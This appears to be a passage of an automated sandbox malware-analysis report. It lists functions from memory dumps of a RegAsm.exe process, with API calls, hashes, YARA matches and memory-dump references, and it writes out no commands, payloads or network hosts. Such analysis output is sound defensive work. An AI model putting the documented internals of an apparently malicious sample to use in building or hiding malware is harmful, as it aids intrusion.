                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3099930812-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9cac7cf8adf9544d05115e9e868d43c84a38078b29bb2c41b7291d1ad22a2e37
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08fd6b7cdb5f1f35f0b1a3597776a61fadc93441d47195856eb7d8ee17ae8048
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cac7cf8adf9544d05115e9e868d43c84a38078b29bb2c41b7291d1ad22a2e37
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C51C375A00118ABEB24DEA9DD41ABFB7FAEB88714F14413AFD05E7380D638DD0187A5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C85BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6C85BE49), ref: 6C85BEC4
                                                                                                                                                                                                                                                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6C85BEDE
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C85BE49), ref: 6C85BF38
                                                                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL ref: 6C85BF83
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(6C85BE49,00000000), ref: 6C85BFA6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2764315370-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 51b3d8320ced303f912b48333a964a28e5cdd086e0a84b89a4c01a5d4297f72a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 77316657f53e0569b257f567563bc256a53ebd91ef8c2556d29dacb4b8466f23
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51b3d8320ced303f912b48333a964a28e5cdd086e0a84b89a4c01a5d4297f72a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51DF71B002058FE760CF69CE80BAAB3A2FF98314F684A39D505A7B54D771F9168F80
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C848E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?,6C86D734), ref: 6C848E6E
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?,6C86D734), ref: 6C848EBF
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?), ref: 6C848F24
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?,6C86D734), ref: 6C848F46
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?), ref: 6C848F7A
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?), ref: 6C848F8F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 779b6c9f3eb84500b50043a77bfaf82d3a491f50b8dbf69e2543abdfa574a724
                                                                                                                                                                                                                                                                                                  • Instruction ID: cf1b3202fc97bb5cfe051175d90db96c1ce300825a2d17c46fb2ffa0f3a7cca7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 779b6c9f3eb84500b50043a77bfaf82d3a491f50b8dbf69e2543abdfa574a724
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 595192B1A0121A8FEB24CF58D98076E77B2BF45318F15492AD916EB740E731F905CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7F4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7F4E5A
                                                                                                                                                                                                                                                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7F4E97
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F4EE9
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7F4F02
                                                                                                                                                                                                                                                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C7F4F1E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d0bfb08bf6c34bbf4ae84ff0016d9704aba461587adc1fc941f129aff5391b28
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56a68ce02e11a6a51cc70ef77113c2814670c9c6521af79768b8977abed585e1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0bfb08bf6c34bbf4ae84ff0016d9704aba461587adc1fc941f129aff5391b28
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41EF716087019FD701CF29CAC095BB7E8BF89344F148A2DF46A97B41DB30E95ADB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00407110 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                                                                  • String ID: @$v10
                                                                                                                                                                                                                                                                                                  • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                                                                                  • Opcode ID: 304db8ddecfb4f90993bf572011f2372e06cab6271bf016aec400aa179d92d18
                                                                                                                                                                                                                                                                                                  • Instruction ID: bc877a00b6be1911ea749fb3dd60229a4ca787db668d3e64565dcedf7a12a3aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 304db8ddecfb4f90993bf572011f2372e06cab6271bf016aec400aa179d92d18
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41C171E04259ABCB10DF94DC41BEEB7B8AB45B14F10826FF915B72C0D7B86904CB99
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C801530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C80159C
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C8015BC
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C8015E7
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C801606
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C801637
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 733145618-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b7572eb9fd6ebfef837b0ceae010ae7deef36ca80fabdbc195b58cae6779d583
                                                                                                                                                                                                                                                                                                  • Instruction ID: ec648da3749491a30397686358b9814a99ddc5b7342158ca0324be2aef7aebad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7572eb9fd6ebfef837b0ceae010ae7deef36ca80fabdbc195b58cae6779d583
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8231B5B1B001148FCB288E68DE5146E76A5AB81378B280F3DE823DBBD4EB30D9048791
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C85AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AD9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85ADAC
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AE01
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AE1D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AE3D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3161513745-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 71402c416e432e0a0009218859e50606309ebef6bbee6485ceb6a9d79bb26a10
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e84868e2a688f10a2fccc4f71693ac718abf6e6e073160e7ea3a9dda2512c5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71402c416e432e0a0009218859e50606309ebef6bbee6485ceb6a9d79bb26a10
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46312FB1A002159FDB60DF798D88ABBB7F8AF49614F554839E85AD7700E774A804CBB0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C855EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C86DCA0,?,?,?,6C82E8B5,00000000), ref: 6C855F1F
                                                                                                                                                                                                                                                                                                  • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C82E8B5,00000000), ref: 6C855F4B
                                                                                                                                                                                                                                                                                                  • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C82E8B5,00000000), ref: 6C855F7B
                                                                                                                                                                                                                                                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C82E8B5,00000000), ref: 6C855F9F
                                                                                                                                                                                                                                                                                                  • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C82E8B5,00000000), ref: 6C855FD6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1389714915-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b3bcb0ce2c38035e391852d2455b188f4ab2f6c8789b12a16c70f6e8c75d7ee
                                                                                                                                                                                                                                                                                                  • Instruction ID: 221ec7633f4376961435195cf10225515c83c942b33cfddbc4c9032a0eb196a4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b3bcb0ce2c38035e391852d2455b188f4ab2f6c8789b12a16c70f6e8c75d7ee
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E314E343006008FD761CF29C998E2ABBF6FF89319BA44968F55687B95C772EC51CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7FB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C7FB532
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C7FB55B
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7FB56B
                                                                                                                                                                                                                                                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C7FB57E
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7FB58F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 05150207e4e53adcf7e57740a8077d62bd5afdcddbe953fe50a71f6ab74c4e8b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 120b9d5d34843048136ce6891e50e42a69f8bfbab7b37ab80c7f4e34247fc54a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05150207e4e53adcf7e57740a8077d62bd5afdcddbe953fe50a71f6ab74c4e8b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F21F871A04205DBDB018F69CD84B6EBBB9FF42308F284039E824DB341E775E912C7A1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C856E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C856E78
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: InitializeCriticalSection.KERNEL32(6C87F618), ref: 6C856A68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: GetCurrentProcess.KERNEL32 ref: 6C856A7D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: GetCurrentProcess.KERNEL32 ref: 6C856AA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: EnterCriticalSection.KERNEL32(6C87F618), ref: 6C856AAE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C856AE1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C856B15
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C856B65
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: LeaveCriticalSection.KERNEL32(6C87F618,?,?), ref: 6C856B83
                                                                                                                                                                                                                                                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C856EC1
                                                                                                                                                                                                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C856EE1
                                                                                                                                                                                                                                                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C856EED
                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C856EFF
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4058739482-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6222d7995ca994d9392da38c202ecb3671778bb902259a8746ad288fffeb84cb
                                                                                                                                                                                                                                                                                                  • Instruction ID: e7767227cd3990553cf429b807506e6fa5a328f09c63ea276b9bfd51461c3ec1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6222d7995ca994d9392da38c202ecb3671778bb902259a8746ad288fffeb84cb
